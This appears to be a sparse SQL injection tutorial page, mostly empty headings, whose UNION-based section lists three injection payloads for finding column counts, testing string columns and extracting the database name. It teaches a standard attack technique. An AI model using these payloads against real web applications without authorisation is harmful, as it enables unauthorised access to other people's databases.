SQL Injection

Introduction

Basics of SQL Language

What is SQLi

How to detect SQLi


Error Based SQLi



Boolean Based SQLi


UNION Based SQLi




After testing different number of columns, we can find the right number of columns in the database with this search query
' UNION SELECT NULL,NULL,NULL,NULL,NULL -- //

We can also see that all of the columns can take a string input with this query
' UNION SELECT 'a','a','a','a','a' -- //

We can see the name of the database with this query
' UNION SELECT 'a',database(),'a','a','a' -- //


Automating Exploitation





Last updated
Was this helpful?